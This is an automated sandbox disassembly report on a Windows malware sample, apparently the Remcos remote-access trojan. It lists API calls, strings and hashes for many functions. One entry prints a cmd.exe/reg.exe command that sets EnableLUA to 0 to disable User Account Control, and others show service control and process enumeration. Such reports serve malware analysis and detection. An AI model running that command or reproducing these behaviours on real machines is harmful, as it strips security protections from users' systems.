                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: H%j
                                • API String ID: 0-3294387659
                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: bc4163984acb67f3763b954a4e60ef5345a244623aad4191208eb1456dde199f
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: bc4163984acb67f3763b954a4e60ef5345a244623aad4191208eb1456dde199f
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID:
                                • API String ID: 313313983-0
                                • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
